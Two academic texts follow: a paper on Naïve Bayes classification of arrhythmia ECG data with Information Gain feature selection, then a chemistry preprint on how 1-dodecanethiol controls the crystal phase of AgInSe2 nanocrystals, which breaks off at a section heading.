Arrhythmia is a type of cardiac illness identified by an irregular heart rhythm that can be either too rapid or too slow. An electrocardiograph method is required to diagnose arrhythmia. Electrocardiogram (ECG) is the result of this Electrocardiograph process. The ECG is then utilized as a diagnostic tool for arrhythmia. Because the ECG data is so extensive, an adequate processing procedure is required. Understanding the ECG data can be done in various ways, one of which is classification. Naïve Bayes is a classification technique that can handle enormous amounts of data. ECG data has a lot of characteristics, which makes classification more difficult. Feature selection can be used to eliminate non-essential features from a dataset. This research aimed to determine the feature selection’s impact on the Naïve Bayes classification. It was proven by increased accuracy, precision, recall, and f-measure by 4%, 0.13, 0.13, and 0.14, respectively. The computation time was 0.03 seconds faster. The highest performance was obtained by classification with 80 features. The accuracy was 93%, precision and recall were 0.45, f-measure was 0.42, and computation time was 0.10 seconds .
Introduction
Arrhythmia is heart disease characterized by an abnormal heart rhythm, becoming too fast or too slow. Diagnosing Arrhythmia cannot be done only by physical examination because some arrhythmia types do not have symptoms the patient feels. To diagnose an arrhythmia, an Electrocardiograph procedure is needed. An electrocardiograph records the heart's electrical activity by attaching leads (electrodes) to the patient's chest, arms, and legs. This Electrocardiograph will detect changes in each heartbeat's depolarization and repolarization pattern. The recording is in the form of an electrocardiogram or ECG. This ECG is then used as a reference for diagnosing an arrhythmia.
To diagnose an arrhythmia, an analysis of ECG data is needed to obtain a diagnosis by determining the actual patient's condition. Analyzing ECG data is not easy. The vast amount of ECG datasets becomes a hindrance in the analysis process.
Classification is one of the approaches that can be used to analyze ECG data. The analysis results can be used as a reference for diagnosing Arrhythmia based on the result of the ECG. One classification algorithm that is widely used is Naïve Bayes. This algorithm uses probability and statistics based on the Bayes theorem.
This study used the Naïve Bayes algorithm to classify arrhythmia data. The selection of Naïve Bayes is based on several studies that have been conducted before. Previously, there had been a lot of research using the Naïve Bayes algorithm. Some advantages of Naïve Bayes are: it has better performance rather than some other algorithms [1] [2], it does not require extensive data to conduct the training process [3], and Naïve Bayes has a high level of accuracy and speed when it is applied to large amounts of data [4]. Therefore, this study used Naïve Bayes as a classification algorithm due to its performance.
A large amount of data contains many features; either they are relevant, irrelevant, or redundant features. Ignoring the irrelevant and redundant features will confuse the data classification process. Thus, it will reduce the speed of classification, increase computational costs and memory usage, and significantly influence the classification result [4] [5]. The number of features can cause overfitting on the model, causing a decrease in the model performance. Therefore, preprocessing stages were needed to select the relevant parts.
Feature selection is a technique for selecting relevant features based on specific criteria. Thus, it can improve training performance, such as increasing classification accuracy, reducing computational costs, and making better model interpretation [6]. Generally, feature selection has three models: wrapper, filter, and embedded. The filter feature selection has some advantages. They have lower computation time than other types, are simple and fast, quickly measure high dimensional data, and are independent of the classification algorithm. One of the filter feature selection algorithms is Information Gain. This algorithm can handle the feature selection process quickly [7]. Also, it is more effective in removing features with excellent accuracy [8]. Due to the advantages described above, the feature selection used in this study was Information Gain. Therefore, this study will discuss the effect of feature selection on the performance of the Naïve Bayes classification model in diagnosing an arrhythmia. The feature selection use would be expected to improve the performance of the Naïve Bayes classification model.
Electrocardiogram
Electrocardiography is a term in use in the cardiovascular field. Electrocardiography is used to examine and diagnose abnormalities in the heart by recording the electrical activity of the heart using leads placed on the chest, arms, and legs to detect changes in the depolarization pattern and repolarization of each heartbeat. The recording result is in the form of an electrocardiogram or commonly known as an ECG. ECG is used to diagnose specific heart disease types, such as arrhythmias. There are several types of ECG waves, as shown in Figure 1. The Pwave depicted atrial depolarization. The Q-wave is the beginning of ventricular depolarization. PR is the interval between the P wave's start and the RQS complex's start. The PR segment is the end of the P-wave until the beginning of the QRS complex. The QRS complex is the ventricular depolarization time interval. ST described the period of ventricular depolarization. T-wave describes ventricular repolarization [1].
Arrhythmia Dataset
The dataset used in this study was the arrhythmia dataset. Arrhythmia is a disorder of abnormal heart rhythm which causes the heart rate to be faster or slower than the usual rhythm. This dataset was downloaded from the Large Dataset, UCI Machine Learning Repository. This dataset had 279 features with 452 labeled data.
The arrhythmia dataset had 279 features. They were the result of ECG interpretation and recorded data from 452 patients. There were 73 features with nominal data types, and 206 other features with numeric data types. The dataset had 16 classes, namely normal class and several classes that refer to the arrhythmia types. The first Class had 245 data, and 185 other data were divided into different classes. There were three classes, including those which did not appear in the dataset. They were the 11 th , 12 th , and 13 th classes. The class distributions in the dataset are shown in Table 1.
Feature Selection
Feature selection is a technique for selecting relevant features based on specific criteria with the slightest possible elimination of information; thus, it could improve training performance such as increasing classification accuracy, decreasing computation costs and memory usage [2], and better model interpretation [3]. The number of features could cause overfitting in the model, which causes a decrease in the model's performance. Feature selection can reduce the dimension of the feature, cut the required storage space, eliminate irrelevant and excessive data and noise in the data, speed up running time in the learning algorithm, enhance data quality and improve the accuracy of the resulting model [4].
Filter
Filter is distinct from the classification process; thus the feature selection process is not affected by the bias of the learning algorithm. Filter technique will sort features based on specific criteria; then the top features will be used in the classification process. It is a simple and fast technique to easily measure high-dimensional data. Some algorithms included in the filter technique are Relief, Fisher Score, and Information Gain.
Wrapper
Unlike filter, wrapper technique performs feature selection along with the classification process using accuracy estimation of the classification model. This type of feature selection is not recommended to handle data with vast number of features. Compared to some filter techniques, the wrappers have higher computational costs and increase risk of overfitting.
Embedded
Embedded is a feature selection technique embedded in classification construction. This feature selection utilizes all features to train the classification model and removes less influential features with a coefficient close to 0. This technique has better computational costs compared to the wrapper technique. Decision Trees is an algorithm of the embedded method.
Information Gain
Information Gain (IG) is one of feature selection algorithms in the filter model. IG calculates the gain value of each feature and gives a score based on the gain value, then ranks the scores. The gain value shows how much influence a feature has on data classification. The higher gain value of a feature indicates a more relevant feature.
Information Gain uses the entropy concept to measure uncertainty of dataset features. The following is the equation for calculating entropy [6]:
Classification
Classification is a data analysis method to group data into appropriate classes in order to understand data more efficiently. Classification can be applied to various fields, such as marketing targets, manufacturing, diagnosis in medical field, etc. Classification has four fundamental components [7]: 1. Class is dependent categorical variable form that represents label as the classification result, such as customer loyalty, earthquake types, etc. 2. Predictors represent data characteristics or attributes such as blood pressure, season, marital status, wind speed and direction, etc.
3. Training dataset, a data set with class and predictors. This data is used for training the model to recognize the appropriate class based on the available predictors. 4. Testing dataset, new data that will be classified by the model that has been constructed.
The stages in data classification process involve a process of constructing a model (learning step) and application of the model (classification step) [6]. In the learning phase, the model is built based on data that has complete information, such as features or class labels. The training data is analyzed by the classification algorithm that has been constructed. While at the classification stage, the model will be used to determine class of the testing data. This step will calculate the accuracy rate of the classification algorithm based on the percentage of testing data that the model appropriately classifies.
Several things that are used as considerations in choosing a method in classification model are accuracy rate of the model in classifying data, speed in processing data, the reliability when it faces noises in the data, easy-to-understand model interpretation, and the simplicity of the model [7]. Some classification algorithms frequently used are Decision Tree, Naïve Bayes, Neural Network, K-nearest Neighbor, etc.
Naïve Bayes
One of the classification algorithms widely used is Naïve Bayes. It predicts future opportunities based on previous experience using probability and statistical methods as the Bayes theorem concept. Compared to other algorithms, some advantages of Naïve Bayes are easy to use, lower error rate, high accuracy rate, and fast if applied to extensive data because it does not require complex repetition scheme parameters [6]. Naïve Bayes with the naïve assumption can reduce computation time by multiplying the probabilities. Because of its simplicity, Naïve Bayes can handle datasets with many features.
Bayes theorem states that the occurrence probability of specific characteristic samples in C class (posterior probability) is the probability of C class (prior) multiplied by the probability of sample characteristics in C class (likelihood), divided by the probability of global sample characteristics (evidence). Below is the Bayes theorem equation: X : Data with an unknown class C : Data hypothesis P(C|X) : Probability of hypothesis C based on the condition of X (posterior probability) P(C) : Probability of hypothesis C (prior probability) P(X|C) : Probability of X based on the condition of hypothesis C P(X) : Probability of X (evidence) For the classification with continuous data, the Gauss Density (Gaussian distribution) formula is used as follows:
K-fold Cross-Validation
Cross-Validation is a technique used to assess the performance of a model or algorithm by partitioning data into training data and testing data. K-fold Cross Validation is one of the Cross Validation methods. It will divide data into K partitions. (K-1) partition is used as testing data, and the remaining is used as training data. Then the Cross-Validation process is repeated for K times with different test data [6].
Classification Evaluation
To find out the performance of a classification model, it is necessary to conduct a classification evaluation process. The evaluation method used in this study was Confusion Matrix as a measure of accuracy [7]. Table 2 describes the Confusion Matrix model. Evaluation using Confusion Matrix will produce accuracy rate, precision, recall, and f-measure values. Confusion Matrix contains several cases that are correctly classified and incorrect ones.
Precision is case proportion predicted as positive, which is also true positive on the actual data. In other words, precision is the exactness level by dividing the number of relevant items selected with all selected items. The following is a precision calculation with a confusion matrix table: Recall is the proportion of actual positive cases that are correctly predicted as positive. In other word, recall is success level (completeness) in finding relevant items by dividing the number of relevant items selected with the total number of relevant items available. The following is a recall calculation with a confusion matrix table: F-measure is used to evaluate classification performance which is a combination of precision and recall. Below is the equation to calculate fmeasure: TP (True Positive) : Positive prediction detected by the system that matches the actual state TN (True Negative) : Negative prediction detected by the system that matches the actual state FP (False Positive) : Positive prediction detected by the system but not in accordance with the actual state FN (False Negative) : Negative prediction detected by the system but not in accordance with the actual state
Research Methodology
The system constructed in this study was a classification system with the Naïve Bayes method. The dataset used was a diagnosis of Arrhythmia with no missing value and is ready to use. In this system, a feature selection process was used to determine the effect of applying the feature selection on the performance of the Naïve Bayes classification. Several experimental scenarios will be carried out to determine the impact of feature selection on Naïve Bayes classification. They were the classification with and without feature selection with several different conditions. An evaluation process would be carried out using the Confusion Matrix. The system design is shown in Figure 2 below.
Input Dataset
It was the Arrhythmia dataset, the diagnostic data based on patient's heart activities. The dataset was downloaded from the Large Dataset, UCI Machine Learning Repository. It consisted of 452 data, including 279 features such as age, gender, weight and height of the patient, heart rate and other patient data.
Data cleaning was performed by filling the missing value with the average value of each feature: P, T, QRST, and Heart. Meanwhile, the feature J was omitted because there were many missing values. Data cleaning was undertaken by eliminating 17 features with a single value because they did not have variation. Therefore, the numbers of data and features used in this study were 452 data with 261 features.
Feature Selection
The input data will go through the feature selection process using the Information Gain (IG) method. In this step, the gain value of each feature will be calculated. It will be ranked; the greater the gain value of a feature shows how relevant the feature is to the classification process. The result of this feature selection process is relevant features that will be used in the classification process.
Classification
The next step is constructing a classification model using the Naïve Bayes method with Gaussian distribution. The construction of the model starts by calculating the prior of each class, the mean, and the standard deviation of each feature in each class. The mean and the standard deviation will be used to calculate the likelihood of each feature. Based on the prior and likelihood values. The value of posterior would be used as a standard classification.
Testing and Evaluation
To measure the method performance, then the test was carried out with several scenarios as follows: 1. 1 st scenario, Naïve Bayes classification test was conducted with no feature selection. 2. 2 nd scenario was the Naïve Bayes classification test with Information Gain feature selection. The Information Gain would be applied by using the ranking limit of certain features (n = 40, 80, 120, 160, 200, 240). Each test above would produce accuracy, precision, recall, f-measure value, and computation time to assess the performance of the Naïve Bayes classification model.
The evaluation phase was performed by using K-fold Cross-Validation with k = 5 in each testing scenario. To find out the performance of the classification model, calculations of accuracy, precision, recall, and fmeasure were performed using the Confusion Matrix and ROC (Receiver Operating Characteristic) curve. The performance of the two testing scenarios would be compared to find out the best scenario.
Finding and Discussion
As explained earlier that the test was carried out with two scenarios: classification without feature selection and with feature selection. The goal was to get the best procedure out of the two scenarios. Tables 3 and 4 resulted from implementing the first and the second testing scenarios. In the second testing scenario, the experiments were conducted six times by applying the Naïve Bayes classification model and feature selection using different amounts of features: 40, 80, 120, 160, 200, and 240 features. From the series of experiments above, we got the average accuracy rate of 90%, while the average value of precision, recall, and fmeasure obtained were 0.33, 0.35, and 0.30, respectively. The experiment was carried out by spending an average of 0.11 seconds.
A series of experiments in the second testing scenario produced a comparison graph of the accuracy rate, as shown in Figure 3.
Figure 3. Comparison of Accuracy of 2 nd Testing Scenario
As shown in Figure 3, the accuracy rates of the 2 nd testing scenario series with 40, 80, 120, 160, 200, and 240 features were 91%, 93%, 93%, 92 %, 87%, and 86%, respectively. The highest accuracy rate (93%) was obtained in experiments with 80 and 120 features, while the lowest accuracy rate (86%) was gained in an experiment with 240 features. Figure 4 describes a comparison graph of the precision, recall, and fmeasure values of the 2 nd testing scenario series. The graph in Figure 4 clearly showed that the experiment with 80 features had the highest value of precision, recall, and f-measure compared to other experiments. In an experiment with 80 features, the precision and recall values were 0.45, and the f-measure value was 0.42.
In contradiction, the experiment with 240 features had the lowest value of precision, recall, and f-measure compared to other experiments. The precision, recall, and f-measure value gained in the experiment were 0.21, 0.25, and 0.17, respectively. Primarily, the computation time increased linearly. The more features used, the longer it took to complete the classification process. Table 4.3 compares the experiment results between 1 st scenario and 2 nd scenario. The 2 nd scenario's result was the average value of six experiments using feature selection of several different features.
The average accuracy rate in the second scenario increased by 4% more than in the first scenario, as shown in Figure 6. It can be seen clearly in Figure 8 that in the second scenario, precision, recall, and f-measure had increased significantly compared with the first scenario. Precision increased by 0.13, recall increased by 0.13, and fmeasure increased by 0.14. Overall, Table 4.3 and Figure 8 show that 2 nd scenario's result was better than 1 st scenario's According to the experiments' results above, feature selection implementation could increase the accuracy rate, precision, recall, and fmeasure. The computation time needed for the classification process is also getting faster. Overall, it would improve the performance of the Naïve Bayes classification model.
Conclusion
From the results of the two scenarios carried out in this study, it can be concluded that feature selection influenced the performance of the Naïve Bayes classification model on the Arrhythmia diagnosis. The implementation of feature selection could increase accuracy rate by 4%, precision by 0.13, recall by 0.13, and f-measure by 0.14 while the computation time was 0.03 seconds faster. The highest performance is obtained by classification with 80 features. The accuracy was 93%, precision and recall were 0.45, f-measure was 0.42, and the computation time was 0.10 seconds. | 2022-11-17T16:07:23.507Z | 2022-07-31T00:00:00.000 | {
"year": 2022,
"sha1": "654446035eed9472f03515e3ef3ca032ff155df3",
"oa_license": "CCBYSA",
"oa_url": "https://journal.trunojoyo.ac.id/ijseit/article/download/15265/pdf",
"oa_status": "GOLD",
"pdf_src": "Anansi",
"pdf_hash": "3275a3856aabbb16e5c91a928e1a229972e3c50a",
"s2fieldsofstudy": [
"Medicine",
"Computer Science"
],
"extfieldsofstudy": []
} |
209380414 | pes2o/s2orc | v3-fos-license | Ligand-Mediated Phase Control in Colloidal AgInSe2 Nanocrystals
Synthetic studies of colloidal nanoparticles that crystallize in metastable structures represent an emerging area of interest in the development of novel functional materials, as metastable nanomaterials may exhibit unique properties when compared to their counterparts that crystallize in thermodynamically preferred structures. Herein, we demonstrate how phase control of colloidal AgInSe 2 nanocrystals can be achieved by performing reactions in the presence, or absence, of 1-dodecanethiol. The thiol plays a crucial role in formation of metastable AgInSe 2 nanocrystals, as it mediates an in-situ topotactic cation exchange from an orthorhombic Ag 2 Se intermediate to a metastable orthorhombic phase of AgInSe 2 . We provide a detailed mechanistic description of this cation exchange process to structurally elucidate how the orthorhombic phase of AgInSe 2 forms. Density functional theory calculations suggest that the metastable orthorhombic phase of AgInSe 2 is metastable by a small margin, at 10 meV/atom above the thermodynamic ground state. In the absence of 1-dodecanethiol, a mixture of Ag 2 Se nanocrystal intermediates form that convert through kinetically slow, non-topotactic exchange processes to yield the thermodynamically preferred chalcopyrite structure of AgInSe 2 . Finally, we offer new insight into the prediction of novel metastable multinary nanocrystal ABSTRACT: Synthetic studies of colloidal nanoparticles that crystallize in metastable structures represent an emerging area of interest in the development of novel functional materials, as metastable nanomaterials may exhibit unique properties when compared to their counterparts that crystallize in thermodynamically preferred structures. Herein, we demonstrate how phase control of colloidal AgInSe 2 nanocrystals can be achieved by performing reactions in the presence, or absence, of 1-dodecanethiol. The thiol plays a crucial role in formation of metastable AgInSe 2 nanocrystals, as it mediates an in-situ topotactic cation exchange from an orthorhombic Ag 2 Se intermediate to a metastable orthorhombic phase of AgInSe 2 . We provide a detailed mechanistic description of this cation exchange process to structurally elucidate how the orthorhombic phase of AgInSe 2 forms. Density functional theory calculations suggest that the metastable orthorhombic phase of AgInSe 2 is metastable by a small margin, at 10 meV/atom above the thermodynamic ground state. In the absence of 1-dodecanethiol, a mixture of Ag 2 Se nanocrystal intermediates form that convert through kinetically slow, non-topotactic exchange processes to yield the thermodynamically preferred chalcopyrite structure of AgInSe 2 . Finally, we offer new insight into the prediction of novel metastable multinary nanocrystal phases that do not exist on bulk phase diagrams.
formation of metastable AgInSe 2 nanocrystals, as it mediates an in-situ topotactic cation exchange from an orthorhombic Ag 2 Se intermediate to a metastable orthorhombic phase of AgInSe 2 . We provide a detailed mechanistic description of this cation exchange process to structurally elucidate how the orthorhombic phase of AgInSe 2 forms. Density functional theory calculations suggest that the metastable orthorhombic phase of AgInSe 2 is metastable by a small margin, at 10 meV/atom above the thermodynamic ground state. In the absence of 1-dodecanethiol, a mixture of Ag 2 Se nanocrystal intermediates form that convert through kinetically slow, non-topotactic exchange processes to yield the thermodynamically preferred chalcopyrite structure of AgInSe 2 . Finally, we offer new insight into the prediction of novel metastable multinary nanocrystal phases that do not exist on bulk phase diagrams.
File list (1) download file view on ChemRxiv Tappan_v10.pdf (3.27 MiB) Metastability, broadly defined, is the kinetic persistence of a system that exists in a higher free energy state than the thermodynamically most stable state for a given set of conditions. The application of metastable materials are ubiquitous, and include examples from diamond wafers for semiconductor applications to the use of technetium-99m as a radiotracer in gamma ray imaging. 1,2 All nanomaterials are inherently metastable with respect to their bulk material counterparts as a result of their high surface energies and large surface area-to-volume ratios. 3,4 In addition to the useful properties afforded by size effects for colloidal nanocrystal analogs of thermodynamically stable bulk materials of that same crystal phase, the thermodynamic scales of phase equilibria on the nanoscale are often compressed, allowing relatively low-temperature syntheses of crystalline polymorphs that only exist at much higher temperatures and/or pressures in the bulk. [5][6][7][8] Furthermore, entirely new crystal phases can arise on the nanoscale that have no known counterparts in bulk. [9][10][11][12][13] Because the physical properties of a material are linked to its crystalline structure, the ability to isolate new or difficult-to-access metastable structures on the nanoscale holds promise for the discovery of novel functional materials with properties different from, and possibly superior to, the properties of more thermodynamically stable materials. [14][15][16][17][18] To synthetically target such materials, it is important to consider that a metastable state is only isolable if, under some set of conditions, that state represents a thermodynamic minimum. 5 In other words, if a state is never the thermodynamically most stable state under any set of conditions, it is not synthesizable.
The synthetic chemistry of colloidal nanocrystals that persist in metastable states with respect to their bulk analogs remains a science largely dependent on empirical findings, rather than on bottom-up design principles. This is partially a result of the myriad variables that can contribute to phase determination, such as nanocrystal size, 8 surface area-to-volume ratio, 19 surface functionalization, 14 crystal defects, 9 etc. These confounding variables make it difficult to draw direct analogies between the thermodynamic phase diagrams of bulk materials and corresponding stabilities at the nanoscale, [20][21][22] thus making the predictable syntheses of metastable colloidal nanocrystals an outstanding challenge. 23 Diorganyl dichalcogenides (R-E-E-R, where E = S, Se, Te, and R = Ph, Me, Bz, etc.) are proven molecular precursors for the preparation of colloidal metal chalcogenide nanocrystals, and in particular, for the preparation of metastable phases of these nanocrystals, including wurtzite or wurtzite-like phases of CuInS2, Cu2SnSe3, Cu2ZnSnS4, and Cu2-xSe. [24][25][26][27] We were the first to report a previously unknown wurtzite-like phase of CuInSe2 from a synthesis utilizing a diselenide precursor, which was shown to be critical in phase determination of the resulting nanocrystals. We subsequently determined that the functional groups on the diselenide precursor could be leveraged to molecularly program different polymorphs of the resulting colloidal CuInSe2 nanocrystals depending on the C-Se precursor bond strength. 24 Herein, we explore a related ternary chalcogenide, AgInSe2, that is of interest for applications in near-infrared luminescence and as a solar absorber for thin film photovoltaics. [28][29][30][31][32][33] Like CuInSe2, AgInSe2 belongs to the family of I-III-VI2 semiconductors that adopt a thermodynamically preferred chalcopyrite structure in bulk. Possessing an A + B 3+ E 2-2 composition, the diamondoid structure of chalcopyrite can be thought of as a supercell of zinc blende, where the A + and B 3+ cations are ordered in the cation sub-lattice and the Se 2sub-lattice adopts a cubic close packed structure. In the case of AgInSe2, a metastable orthorhombic phase is also known to exist only on the nanoscale, where the Se 2sub-lattice adopts a hexagonally close-packed structure. Isostructural with the high-temperature orthorhombic phase of bulk AgInS2, the In 3+ and Ag + cations in this metastable phase of AgInSe2 are ordered and alternate along the [001] crystallographic direction. 34 While dichalcogenides have been utilized to access a wide range of metastable colloidal nanocrystal phases, as previously mentioned, it has also been observed that the presence or absence of coordinating ligands influences phase determination in these reactions. 14,[35][36][37] Herein, we elucidate the role of a coordinating ligand in the phase determination of AgInSe2 nanocrystals synthesized using dibenzyl diselenide as the selenium precursor. This mechanism is notably different from previously proposed mechanisms for the formation of metastable orthorhombic AgInSe2 nanocrystals. [38][39][40] Finally, we propose a general conceptual framework that explains the isolation of previously empirically discovered metastable polymorphs on the nanoscale and may aid in future rational discoveries of metastable materials that do not exist on bulk phase diagrams.
RESULTS AND DISCUSSION
In a typical reaction, AgNO3 and In(OAc)3 were dissolved together in a mixture of 1-octadecene (ODE), 1-dodecanethiol (DDT), and oleic acid. In a separate flask, the dibenzyl diselenide (Bn2Se2) selenium source was dissolved in DDT and ODE. The metal precursor solution was then heated and the solution containing the diselenide was hot injected into the metal precursors at 200 °C. Under these reaction conditions, we observed the formation of colloidally stable, 10-nm AgInSe2 nanocrystals that crystallize in the orthorhombic Pna21 space group, which is a metastable phase of AgInSe2 known to form only on the nanoscale (Figure 1). 34,41 The powder X-ray diffraction (XRD) pattern of the phase-pure orthorhombic nanocrystals is given in Figure 1a. Rietveld refinement of the XRD pattern using the Pna21 space group returns lattice parameters of a= 7.3151(2), b = 8.5366 (3), and c = 6.9638(1) Å, with a unit cell volume of V = 434.86(1) Å 3 . These values are in close agreement with the previously reported experimental values for orthorhombic AgInSe2 (i.e., a = 7.33 Å, b = 8.52 Å, and c = 7.02 Å; V = 438 Å 3 ). 39 This orthorhombic phase is similar to the wurtzite structure type, with the notable distinction between them being the ordering of Ag + and In 3+ in the orthorhombic structure. Discerning wurtzite from wurtzite-like structures can be difficult and has been a point of interest within studies of metastable ternary chalcogenide materials. 15,33,42 In this case, orthorhombic AgInSe2 in the Pna21 space group exhibits distinct low-angle reflections (at 15-16° 2θ) from the (110) and (011) lattice plane families, which are absent in a higher symmetry wurtzite structure type (space group P63mc, see Figure S1). The Rietveld refinement and the observation of lowangle reflections in Figure S1 leads us to conclude that the metastable AgInSe2 nanocrystals do indeed assume a wurtzite-like structure that maintains Ag + and In 3+ ordering within the crystalline lattice.
The diselenide precursor is important for phase determination. When substituting Bn2Se2 for grey selenium in the same solvent mixture, the reaction does not yield product due to the low solubility and reactivity of Se powder under these reaction conditions. However, when Se powder is dissolved in oleylamine and used as the selenium source under otherwise similar conditions, the reaction gives chalcopyrite AgInSe2 nanocrystals. 28 Nonetheless, formation of the metastable orthorhombic phase of AgInSe2 using Bn2Se2 was a surprising result, as it differs from what we observed when employing Bn2Se2 in the synthesis of CuInSe2 nanocrystals; there, diselenide precursors possessing relatively weak C-Se bonds, including Bn2Se2, gave the thermodynamically preferred chalcopyrite phase of CuInSe2. 24 Thus, we anticipated that Bn2Se2 might similarly produce the thermodynamically preferred chalcopyrite phase of AgInSe2, yet this turned out not to be the case. This indicates that the mechanism of formation of this metastable phase when using Bn2Se2 is distinct from that which was previously observed for the formation of CuInSe2.
Although Bn2Se2 leads to the metastable orthorhombic phase of AgInSe2, we surmised that increasing the reaction temperature might yield the thermodynamic phase of AgInSe2. The initial reactions with Bn2Se2 to give orthorhombic AgInSe2 nanocrystals were performed at 220 °C. Increasing reaction temperatures to 250 °C still resulted in formation of metastable orthorhombic AgInSe2 with no indication of chalcopyrite formation by XRD (Figure 1a). Annealing powders of the metastable AgInSe2 nanocrystals to 300 °C in the solid state also does not cause the material to thermally relax to the chalcopyrite phase, even after several heating/cooling cycles (Figures S2, S3). Moreover, after leaving the as-prepared orthorhombic AgInSe2 nanocrystals for ~10 months on the lab bench under ambient conditions, they maintain their metastable orthorhombic structure ( Figure S2). Heating the as-synthesized orthorhombic AgInSe2 nanocrystals at 300 °C for 1 h as a colloidal suspension in ODE also leaves the metastable phase mostly intact, although some conversion to the chalcopyrite phase was observed, indicating that this metastable phase is more resistant to relaxation as a powder at high temperatures than as a colloid in solution ( Figure S2). Empirically, the orthorhombic phase of these AgInSe2 nanocrystals appears to be a local minimum in the energetic landscape of this material system that has a high barrier to reorganization to the thermodynamically preferred phase, and thus the orthorhombic phase remains kinetically persistent.
To explore the potential roles of the coordinating species (i.e., DDT and oleic acid) in phase determination, they were systematically omitted from the reactions. When oleic acid is omitted from the reaction by replacing it with an equal volume of DDT, under otherwise identical conditions, the reaction still returns orthorhombic AgInSe2 (Figure S4). This suggests that oleic acid does not play a major role in phase determination. Conversely, when DDT is replaced by an equal volume of oleic acid, we found that the analogous hot-injection reaction with Bn2Se2 performed at 250 °C yields chalcopyrite AgInSe2 with minor Ag2Se impurities ( Figure S4). This result illustrates that: (1) Bn2Se2 can give the thermodynamic phase under certain reaction conditions, and (2) DDT plays a critical role in phase determination in this reaction. Formation of Chalcopyrite AgInSe2. To probe the formation of chalcopyrite AgInSe2, a study was performed without DDT in which aliquots were removed at certain time points after the injection of Bn2Se2. Powder XRD patterns of nanocrystal products isolated from each aliquot show a complex mixture of Ag2Se intermediates at early times that, over the span of 15 min, convert into chalcopyrite AgInSe2 upon reaction with In 3+ in solution (Figure 2a). Bulk Ag2Se exhibits two stable polymorphs --namely, a low-temperature orthorhombic phase and a high temperature (T > 130 °C) cubic phase. 9,43 However, an additional metastable tetragonal polymorph is known to form within polycrystalline thin films and for Ag2Se nanocrystals. [9][10][11][12][13] To the best of our knowledge, the crystal structure of this tetragonal phase of Ag2Se has not yet been unambiguously determined, in large part due to its instability as a bulk material under any known conditions. Even so, Wang et al. conducted a thorough investigation of the phase transitions that occur between the tetragonal, orthorhombic, and cubic phases of Ag2Se nanocrystals by variable-temperature powder XRD measurements. 9 For their system, they reported that the tetragonal phase undergoes a phase transition to the cubic phase at ~110 °C, whereas the low-temperature orthorhombic phase converts to the cubic phase at ~140 °C. Figure 2a illustrates that 1 min after injecting Bn2Se2 into the metal precursor solution in the absence of DDT, all three distinct polymorphs of Ag2Se are present (i.e., orthorhombic, tetragonal, and cubic structures). Phase quantification of each respective polymorph is difficult due to the high degree of overlap of the powder XRD patterns of these three phases. Both the orthorhombic and the tetragonal phases of Ag2Se are likely metastable at the reaction temperature of the aliquot study, and they are both capable of undergoing direct phase transitions to form cubic Ag2Se at elevated temperatures, which led us to believe that perhaps the cubic phase of Ag2Se is the binary intermediate that ultimately gives rise to chalcopyrite AgInSe2. However, a control experiment in which Bn2Se2 was hot-injected into a flask containing only AgNO3 (i.e., with no In(OAc)3 precursor) revealed that these Ag2Se phases do not undergo phase transitions to the cubic phase of Ag2Se after 30 min ( Figure S5) under the same conditions used for the aliquot study shown in Figure 2a, suggesting that each of the intermediate Ag2Se phases must be capable of directly converting to chalcopyrite AgInSe2 in the presence of In 3+ cations. This observation is supported by the fact that on the bulk Ag2Se-In2Se3 pseudo-binary phase diagram of AgInSe2, both cubic and orthorhombic Ag2Se can convert to chalcopyrite AgInSe2 with increasing In 3+ content. 41 On the nanoscale, conversion of Ag2Se to AgInSe2 can be thought of as a partial cation exchange in which two equivalents of Ag2Se combine with one equivalent of In 3+ to yield AgInSe2 with the expulsion of three Ag + ions. Neither orthorhombic nor cubic Ag2Se have cubic close-packed Se 2anion sub-lattices (i.e, cubic Ag2Se is body-centered cubic and orthorhombic Ag2Se is nearly hexagonally close-packed, vide infra), whereas the Se 2sub-lattice of chalcopyrite AgInSe2 is cubic close-packed (see Figure S6). Thus, to Figure 2. (a) Aliquot study to elucidate the formation pathway of chalcopyrite AgInSe2 nanocrystals by powder XRD. A mixture of binary Ag2Se phases is obtained at early times. This mixture progresses towards chalcopyrite AgInSe2 as a function of increasing time, but binary intermediates are still present even after 15 min. (b) An aliquot study to follow the formation of the metastable orthorhombic phase of AgInSe2 by powder XRD reveals that this ternary phase forms very quickly when DDT is present in large excess (20 equivalents). (c) Powder XRD aliquot study when nucleating nanocrystals in the presence of 5 equivalents of DDT. XRD shows that under these conditions, the intermediate that forms is predominantly orthorhombic Ag2Se, which is distinct from the mixture of phases observed at early times in the absence of DDT. generate chalcopyrite AgInSe2 nanocrystals from Ag2Se intermediates, a reconstructive transition via non-topotactic cation exchange must occur in which the Se 2sub-lattice reorganizes to a cubic close-packed structure.
While this reorganization to the chalcopyrite structure is thermodynamically favored, it is necessarily kinetically slow. For that reason, the hot-injection syntheses without DDT always resulted in products comprised of chalcopyrite AgInSe2 with some binary Ag2Se impurities, even when reactions were carried out in the presence of excess In(OAc)3 and for extended periods of time ( Figure S7). To improve the phase purity of the chalcopyrite AgInSe2 products, a heating up procedure can be employed, whereby all reagents were combined in a flask with oleic acid and ODE and heated to the desired reaction temperature. This method proved to be more effective in converting the Ag2Se intermediates to a product containing almost exclusively chalcopyrite AgInSe2 ( Figure S7). If this site were occupied with a cation, the resulting tetrahedron would be corner-sharing with neighboring tetrahedra along the edges highlighted in yellow. (d) Full structure of orthorhombic Ag2Se, with the trigonally coordinated Ag + sites shown in blue and tetrahedral sites shown in gray. (e) Depiction of orthorhombic Ag2Se when all trigonal sites are removed from the structure; the periodic tetrahedral holes within the structure are illustrated by dashed red lines. This corner-sharing structure is nearly identical to that of orthorhombic AgInSe2. (f) Full structure of orthorhombic AgInSe2 (green atoms = Se, gray atoms/tetrahedra = silver, pink atoms/tetrahedra = indium).
Formation of Orthorhombic AgInSe2 and the Role of DDT.
